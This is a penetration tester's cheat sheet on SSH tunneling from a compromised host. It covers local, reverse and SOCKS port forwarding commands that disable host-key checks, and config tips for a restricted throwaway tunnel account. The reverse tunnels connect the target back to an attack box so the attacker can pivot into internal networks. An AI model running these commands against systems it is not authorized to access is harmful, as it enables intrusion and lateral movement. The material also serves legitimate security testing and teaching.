Skip to main content

SSH Port Forwarding

Security Considerations

Reverse Tunneling

  • This will require you to establish a SSH connection from the foothold back to your attack box.
  • You want to mitigate any potential for this authentication to be used against you

Public Key Authentication

  • Say you have a throwaway account named junkuser for the purpose of tunneling
  • The SSH public key will be placed in /home/junkuser/.ssh/authorized_keys
  • With public key authentication, you can add options to the authorized key file

Example: authorized_keys

command="echo 'This account is for port forwarding only'",from="192.168.1.11,192.168.1.12",no-user-rc,no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa public-key-here


Password Authentication

  • Public key authentication would be a better choice, because it is much easier to manage key files
  • If you must use passwords, you can add a Match statement to your /etc/ssh/sshd_config file to constrain the user
    • You can combine SSH public key with the Match statement, as well, create a more constrained configuration
  • Say you have a throwaway user named junkuser, just append the user match to the bottom of the config file

Example: sshd_config

Match junkuser
    PermitRootLogin no
    PermitTTY no
    PermitUserRC no
    ForceCommand "echo 'This account is for port forwarding only'"
    PasswordAuthentication yes
    PermitEmptyPasswords no
    MaxAuthTries 2   
    AllowAgentForwarding no
    X11Forwarding no
	X11UseLocalhost no



Individual Port Forwarding

  • A service on a compromised host is listening on 127.0.0.1
  • Open a port on attack box and forward traffic to remote port

Local Port to Remote Port

		Step 1. Estabish SSH Tunnel from Local
							
[Attack Box] [+]==========[SSH]========>> [Remote]

127.0.0.1:[port]					127.0.0.1:[port]
		   [+]									 ^
        	|____________________________________|
        
        Step 2. Forward Local Port to Remote Port
# Generic Command
# ---------------
	# Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port user@target

	# Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port -i /path/to/private-key user@target
	
    # Multiple Port Forward (as many -L as needed)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L attack-ip:attack-port:remote-ip:remote-port -L attack-ip:attack-port:remote-ip:remote-port user@target


# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -L 127.0.0.1:43306:127.0.0.1:3306 user@target
	# [+] Open port 43306 on 127.0.0.1 attack box
	# [+] Forward to 127.0.0.1:3306 on remote via SSH tunnel


Reverse Local Port to Remote Port

		Step 1. Estabish SSH Tunnel from Remote

[Attack Box] <<=========[SSH]========[+] [Remote]

127.0.0.1:[port]					127.0.0.1:[port]
		   [+]									 ^
        	|____________________________________|
        
    Step 2. Reverse Forward Attack Box Port to Remote
# Generic Command
# ---------------
	# Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port user@attack-box-ip
	
    # Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port -i /path/to/private/key user@attack-box-ip
	
    # Multiple Port Forward (as many -R as needed)
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port:local-ip:local-port -R attack-ip:attack-port:local-ip:local-port user@attack-box-ip


# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:43306:127.0.0.1:3306 user@attack-box-ip
	# [+] Open port 43306 on 127.0.0.1 attack box
	# [+] Reverse forward to 127.0.0.1:3306 on remote via SSH tunnel



Forward Dynamic SOCKS Proxy

  • Create a SOCKS proxy that routes all traffic from attack box to the compromised host
  • The compromised host is a transparent proxy and all packets exit out from the compromised host's interface
        Step 1. Estabish SSH Tunnel from Local
																		   ____________  
                                                                          |		 	   |
[Attack Box] [+]=========[SSH]========>> [Remote] ===[Proxy Traffic]==>>  |	  Remote   |
                                            /\                            | Network(s) |
127.0.0.1:[port]							||							  |            |
		   [+]								||							   ------------
		   ||								||
           ||_______________________________||
           |	      Proxy Traffic			 |
           |_________________________________|
           
		Step 2. Create a Transparent SOCKS Proxy
				with Remote Acting as Jump Host
# Generic Command
# ---------------
	# Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D attack-ip:attack-port user@target

	# Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D attack-ip:attack-port -i /path/to/private-key user@target


# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -D 127.0.0.1:50001 user@target
	# [+] Open port 50001 on 127.0.0.1 attack box
	# [+] Forward transparently to any host routable via the target



Reverse Dynamic SOCKS Proxy

  • REQUIRES AT LEAST OpenSSH Client 7.6!
  • Create a SOCKS4 proxy that allows us to route all traffic from Kali through the tunnel on the specified port
  • Convenient when SSH is running on a compromised host, but you don't have an SSH credential
  • Create a dummy account on Kali, generate an SSH key pair, transfer the private key to the target
  • Run on the target
        Step 1. Estabish SSH Tunnel from Remote
																		  ____________  
                                                                         |		 	  |
[Attack Box] <<========[SSH]=========[+] [Remote] ===[Proxy Traffic]==>> |	 Remote	  |
                                            /\                           | Network(s) |
127.0.0.1:[port]							||							 |            |
		   [+]								||							  ------------
		   ||								||
           ||_______________________________||
           |	      Proxy Traffic			 |
           |_________________________________|
           
		Step 2. Create a Transparent Reverse SOCKS Proxy
				with Remote Acting as Jump Host
# Generic Command
# ---------------
	# Password Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port user@attack-box-ip

	# Private Key Authentication
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R attack-ip:attack-port -i /path/to/private-key user@attack-box-ip


# Example Command
# ---------------
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -f -N -R 127.0.0.1:50001 user@attack-box-ip
	# [+] Open port 50001 on 127.0.0.1 attack box
	# [+] Forward transparently to any host routable via the target